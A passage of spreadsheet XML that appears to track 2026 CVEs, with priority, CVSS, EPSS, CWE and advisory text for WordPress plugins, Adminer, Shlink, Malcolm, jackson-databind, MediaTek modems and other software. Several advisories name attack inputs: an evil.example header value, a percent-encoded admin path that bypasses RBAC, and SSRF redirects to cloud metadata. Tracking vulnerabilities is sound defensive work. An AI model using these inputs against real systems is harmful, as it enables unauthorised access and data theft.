          <t>The Content Views  WordPress plugin before 4.5.1.2 does not check whether the user requesting a view is allowed to read the posts it returns, allowing unauthenticated attackers to obtain the title and content of non-public posts, such as draft, pending, private and scheduled posts, when a view has been configured to include them.</t>
        </is>
      </c>
      <c r="M5036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17517</t>
        </is>
      </c>
    </row>
    <row r="5037">
      <c r="A5037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18042</t>
        </is>
      </c>
      <c r="C5037" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5037" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5037" s="5" t="inlineStr"/>
      <c r="F5037" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5037" s="5" t="inlineStr"/>
      <c r="H5037" s="5" t="inlineStr"/>
      <c r="I5037" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5037" s="5" t="inlineStr"/>
      <c r="K5037" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5037" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not verify that the requester is authorized to act on the booking targeted by one of its front-end payment-message handlers, allowing unauthenticated attackers to cancel the payment on any customer's booking.</t>
        </is>
      </c>
      <c r="M5037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18042</t>
        </is>
      </c>
    </row>
    <row r="5038">
      <c r="A5038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18736</t>
        </is>
      </c>
      <c r="C5038" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5038" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5038" s="5" t="inlineStr"/>
      <c r="F5038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5038" s="5" t="inlineStr"/>
      <c r="H5038" s="5" t="inlineStr"/>
      <c r="I5038" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5038" s="5" t="inlineStr"/>
      <c r="K5038" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5038" s="5" t="inlineStr">
        <is>
          <t>Shlink contains a server-side request forgery vulnerability that allows authenticated API key holders to cause the server to issue arbitrary HTTP GET requests by supplying a crafted long URL during short URL creation with title auto-resolution enabled. Attackers can submit URLs pointing to public hosts that redirect to internal targets, including loopback addresses, link-local ranges, and cloud metadata endpoints such as 169.254.169.254, to exfiltrate internal service information via the HTML title element returned in the short URL creation response.</t>
        </is>
      </c>
      <c r="M5038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18736</t>
        </is>
      </c>
    </row>
    <row r="5039">
      <c r="A5039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18750</t>
        </is>
      </c>
      <c r="C5039" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5039" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5039" s="5" t="inlineStr"/>
      <c r="F5039" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5039" s="5" t="inlineStr"/>
      <c r="H5039" s="5" t="inlineStr"/>
      <c r="I5039" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5039" s="5" t="inlineStr"/>
      <c r="K5039" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5039" s="5" t="inlineStr">
        <is>
          <t>vinny/views.py: (ModifyEmailNotifications)	IDOR: view fetches VinceCommEmail by raw pk from URL and toggles email_function/name without checking the record's contact belongs to the requesting group-admin. Lets a vendor admin flip notification routing (or read email/name) for another vendor's contact.</t>
        </is>
      </c>
      <c r="M5039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18750</t>
        </is>
      </c>
    </row>
    <row r="5040">
      <c r="A5040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="C5040" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5040" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5040" s="5" t="inlineStr"/>
      <c r="F5040" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5040" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5040" s="5" t="inlineStr"/>
      <c r="I5040" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5040" s="5" t="inlineStr"/>
      <c r="K5040" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-610</t>
        </is>
      </c>
      <c r="L5040" s="5" t="inlineStr">
        <is>
          <t>jackson-databind's deserializer for java.nio.file.Path resolves an attacker-supplied URI without restricting the URI scheme. In JDKFromStringDeserializer.NioPathHelper.deserialize, a string bound from untrusted JSON is passed to new URI(value) and then to Path.of(uri). When that throws FileSystemNotFoundException, the code enumerates ServiceLoader&lt;FileSystemProvider&gt; and calls provider.getPath(uri) on the first provider whose scheme matches the attacker-chosen scheme. Untrusted JSON can therefore select and drive an arbitrary registered FileSystemProvider during readValue under a default JsonMapper, and forces provider class loading at the same time. With only the JDK built-in providers (file, jar/zipfs) present, the resolved path is inert and no mount or network I/O occurs; further impact requires a side-effecting third-party FileSystemProvider on the classpath. This affects com.fasterxml.jackson.core:jackson-databind from 2.8.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2. Binding java.nio.file.Path from untrusted JSON should be avoided regardless of version.</t>
        </is>
      </c>
      <c r="M5040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="5041">
      <c r="A5041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19614</t>
        </is>
      </c>
      <c r="C5041" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5041" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5041" s="5" t="inlineStr"/>
      <c r="F5041" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5041" s="5" t="inlineStr"/>
      <c r="H5041" s="5" t="inlineStr"/>
      <c r="I5041" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5041" s="5" t="inlineStr"/>
      <c r="K5041" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L5041" s="5" t="inlineStr">
        <is>
          <t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t>
        </is>
      </c>
      <c r="M5041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t>
        </is>
      </c>
    </row>
    <row r="5042">
      <c r="A5042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19625</t>
        </is>
      </c>
      <c r="C5042" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5042" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5042" s="5" t="inlineStr"/>
      <c r="F5042" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5042" s="5" t="inlineStr"/>
      <c r="H5042" s="5" t="inlineStr"/>
      <c r="I5042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5042" s="5" t="inlineStr"/>
      <c r="K5042" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5042" s="5" t="inlineStr">
        <is>
          <t>When a Quarkus application has multiple endpoints secured by individual OIDC provider tenants, such as "/oidc-provider1" that is secured by the OIDC Provider 1 and "/oidc-provider2" that is secured by the OIDC Provider 2, and an optional token introspection cache is also enabled, then a valid token issued by the OIDC Provider 1 that can be used to access "/oidc-provider1" can also be used to access "/oidc-provider2" that is secured by another OIDC Provider 2.</t>
        </is>
      </c>
      <c r="M5042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t>
        </is>
      </c>
    </row>
    <row r="5043">
      <c r="A5043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19670</t>
        </is>
      </c>
      <c r="C5043" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5043" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5043" s="5" t="inlineStr"/>
      <c r="F5043" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5043" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H5043" s="5" t="inlineStr"/>
      <c r="I5043" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5043" s="5" t="inlineStr"/>
      <c r="K5043" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5043" s="5" t="inlineStr">
        <is>
          <t>Malcolm's nginx Lua role-based access control (RBAC) layer decides whether an authenticated user may reach a role-restricted path (e.g. /htadmin, /auth, /admin_login, /arkime/api/esadmin, NetBox, upload endpoints) by pattern-matching the raw, percent-encoded request URI. Nginx itself, however, selects which location block actually serves the request using the percent-decoded, normalized URI. Because the RBAC check never percent-decodes its input, an authenticated low-privilege user can request an admin-only path using percent-encoding (e.g. /%68tadmin.php) and have nginx route it to the restricted location while the Lua RBAC gate evaluating the un-decoded raw string finds no matching restriction and grants access.</t>
        </is>
      </c>
      <c r="M5043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19670</t>
        </is>
      </c>
    </row>
    <row r="5044">
      <c r="A5044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19733</t>
        </is>
      </c>
      <c r="C5044" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5044" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5044" s="5" t="inlineStr"/>
      <c r="F5044" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5044" s="5" t="inlineStr"/>
      <c r="H5044" s="5" t="inlineStr"/>
      <c r="I5044" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5044" s="5" t="inlineStr"/>
      <c r="K5044" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5044" s="5" t="inlineStr">
        <is>
          <t>Server-Side request forgery (SSRF) vulnerability in Yordam Informatics Technology Consulting, Training, and Electronic Systems Industry and Trade Inc. Library Information and Document Automation Program allows Server Side Request Forgery.
This issue affects Library Information and Document Automation Program: before v22.2.</t>
        </is>
      </c>
      <c r="M5044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19733</t>
        </is>
      </c>
    </row>
    <row r="5045">
      <c r="A5045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20503</t>
        </is>
      </c>
      <c r="C5045" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5045" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5045" s="5" t="inlineStr"/>
      <c r="F5045" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5045" s="5" t="inlineStr"/>
      <c r="H5045" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2716, mediatek:mt2716_firmware, mediatek:mt2735, mediatek:mt2735_firmware, mediatek:mt2737, mediatek:mt2737_firmware, mediatek:mt6813, mediatek:mt6813_firmware, mediatek:mt6833, mediatek:mt6833_firmware</t>
        </is>
      </c>
      <c r="I5045" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5045" s="5" t="inlineStr"/>
      <c r="K5045" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L5045" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01371002; Issue ID: MSV-9020.</t>
        </is>
      </c>
      <c r="M5045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20503</t>
        </is>
      </c>
    </row>
    <row r="5046">
      <c r="A5046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20504</t>
        </is>
      </c>
      <c r="C5046" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5046" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5046" s="5" t="inlineStr"/>
      <c r="F5046" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5046" s="5" t="inlineStr"/>
      <c r="H5046" s="5" t="inlineStr">
        <is>
          <t>mediatek:mt2735, mediatek:mt2735_firmware, mediatek:mt6833, mediatek:mt6833_firmware, mediatek:mt6853, mediatek:mt6853_firmware, mediatek:mt6855, mediatek:mt6855_firmware, mediatek:mt6873, mediatek:mt6873_firmware</t>
        </is>
      </c>
      <c r="I5046" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5046" s="5" t="inlineStr"/>
      <c r="K5046" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L5046" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00755024; Issue ID: MSV-7865.</t>
        </is>
      </c>
      <c r="M5046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20504</t>
        </is>
      </c>
    </row>
    <row r="5047">
      <c r="A5047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23930</t>
        </is>
      </c>
      <c r="C5047" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5047" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5047" s="5" t="inlineStr"/>
      <c r="F5047" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5047" s="5" t="inlineStr"/>
      <c r="H5047" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I5047" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5047" s="5" t="inlineStr"/>
      <c r="K5047" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="L5047" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated user is able to cause disproportionate CPU load on the Frontend webserver by sending specifically crafted requests to the Frontend popup.testtriggerexpr action, leading to potential denial of service.</t>
        </is>
      </c>
      <c r="M5047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23930</t>
        </is>
      </c>
    </row>
    <row r="5048">
      <c r="A5048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27463</t>
        </is>
      </c>
      <c r="C5048" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5048" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5048" s="5" t="inlineStr"/>
      <c r="F5048" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5048" s="5" t="inlineStr"/>
      <c r="H5048" s="5" t="inlineStr"/>
      <c r="I5048" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5048" s="5" t="inlineStr"/>
      <c r="K5048" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5048" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, the HTML title attribute of the logo in the login page contains the complete iTop version. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M5048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27463</t>
        </is>
      </c>
    </row>
    <row r="5049">
      <c r="A5049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33219</t>
        </is>
      </c>
      <c r="C5049" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5049" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5049" s="5" t="inlineStr"/>
      <c r="F5049" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5049" s="5" t="inlineStr"/>
      <c r="H5049" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I5049" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J5049" s="5" t="inlineStr"/>
      <c r="K5049" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5049" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M5049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33219</t>
        </is>
      </c>
    </row>
    <row r="5050">
      <c r="A5050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33247</t>
        </is>
      </c>
      <c r="C5050" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5050" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5050" s="5" t="inlineStr"/>
      <c r="F5050" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5050" s="5" t="inlineStr"/>
      <c r="H5050" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I5050" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J5050" s="5" t="inlineStr"/>
      <c r="K5050" s="5" t="inlineStr">
        <is>
          <t>CWE-214, CWE-215</t>
        </is>
      </c>
      <c r="L5050" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M5050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33247</t>
        </is>
      </c>
    </row>
    <row r="5051">
      <c r="A5051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33389</t>
        </is>
      </c>
      <c r="C5051" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5051" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5051" s="5" t="inlineStr"/>
      <c r="F5051" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5051" s="5" t="inlineStr"/>
      <c r="H5051" s="5" t="inlineStr"/>
      <c r="I5051" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5051" s="5" t="inlineStr"/>
      <c r="K5051" s="5" t="inlineStr">
        <is>
          <t>CWE-671</t>
        </is>
      </c>
      <c r="L5051" s="5" t="inlineStr">
        <is>
          <t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t>
        </is>
      </c>
      <c r="M5051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t>
        </is>
      </c>
    </row>
    <row r="5052">
      <c r="A5052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33391</t>
        </is>
      </c>
      <c r="C5052" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5052" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5052" s="5" t="inlineStr"/>
      <c r="F5052" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5052" s="5" t="inlineStr"/>
      <c r="H5052" s="5" t="inlineStr"/>
      <c r="I5052" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5052" s="5" t="inlineStr"/>
      <c r="K5052" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5052" s="5" t="inlineStr">
        <is>
          <t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t>
        </is>
      </c>
      <c r="M5052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t>
        </is>
      </c>
    </row>
    <row r="5053">
      <c r="A5053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34959</t>
        </is>
      </c>
      <c r="C5053" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5053" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5053" s="5" t="inlineStr"/>
      <c r="F5053" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5053" s="5" t="inlineStr"/>
      <c r="H5053" s="5" t="inlineStr"/>
      <c r="I5053" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5053" s="5" t="inlineStr"/>
      <c r="K5053" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5053" s="5" t="inlineStr">
        <is>
          <t>Adminer 4.6.0 before 5.5.0 prepends the client-supplied X-Forwarded-Prefix header to $_SERVER["REQUEST_URI"] with no trusted-proxy check and no validation of the prefix value. An attacker can supply an absolute URL (e.g. X-Forwarded-Prefix: https://evil.example) that flows into Location redirect headers, the Set-Cookie path attribute, and self-referential links. This enables an authenticated open redirect after state-changing POSTs, unauthenticated control of the session cookie path attribute, and poisoning of self-referential links; CR/LF cannot be injected, so header splitting/XSS is not possible.</t>
        </is>
      </c>
      <c r="M5053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34959</t>
        </is>
      </c>
    </row>
    <row r="5054">
      <c r="A5054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34967</t>
        </is>
      </c>
      <c r="C5054" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5054" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5054" s="5" t="inlineStr"/>
      <c r="F5054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5054" s="5" t="inlineStr"/>
      <c r="H5054" s="5" t="inlineStr"/>
      <c r="I5054" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5054" s="5" t="inlineStr"/>
      <c r="K5054" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L5054" s="5" t="inlineStr">
        <is>
          <t>Adminer versions 5.3.0 through 5.4.2 with the sql-log plugin enabled contain an arbitrary file write vulnerability in the ns parameter of plugins/sql-log.php. An authenticated user can supply path traversal sequences in the ns parameter to write arbitrary .sql files with attacker-controlled content to any writable directory on the host.</t>
        </is>
      </c>
      <c r="M5054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34967</t>
        </is>
      </c>
    </row>
    <row r="5055">
      <c r="A5055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37067</t>
        </is>
      </c>
      <c r="C5055" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5055" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5055" s="5" t="inlineStr"/>
      <c r="F5055" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5055" s="5" t="inlineStr"/>
      <c r="H5055" s="5" t="inlineStr"/>
      <c r="I5055" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J5055" s="5" t="inlineStr"/>
      <c r="K5055" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5055" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in /vfm-admin/admin-panel/view/save-cvs.php in Veno File Manager Project 4.4.9 allows an unauthenticated attacker to extract all application logs from a desired date forwards via a specially crafted POST request.</t>
        </is>
      </c>
      <c r="M5055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37067</t>
        </is>
      </c>
    </row>
    <row r="5056">
      <c r="A5056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38819</t>
        </is>
      </c>
      <c r="C5056" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5056" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5056" s="5" t="inlineStr"/>
      <c r="F5056" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5056" s="5" t="inlineStr"/>
      <c r="H5056" s="5" t="inlineStr"/>
      <c r="I5056" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5056" s="5" t="inlineStr"/>
      <c r="K5056" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L5056" s="5" t="inlineStr">
        <is>
          <t>Multiple memory leaks in openNDS before 11.0.0 allow an unauthenticated attacker on the captive portal network to exhaust all available memory on the device within minutes.</t>
        </is>
      </c>
      <c r="M5056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38819</t>
        </is>
      </c>
    </row>
    <row r="5057">
      <c r="A5057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39835</t>
        </is>
      </c>
      <c r="C5057" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5057" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5057" s="5" t="inlineStr"/>
      <c r="F5057" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5057" s="5" t="inlineStr"/>
      <c r="H5057" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I5057" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J5057" s="5" t="inlineStr"/>
      <c r="K5057" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-476</t>
        </is>
      </c>
      <c r="L5057" s="5" t="inlineStr">
        <is>
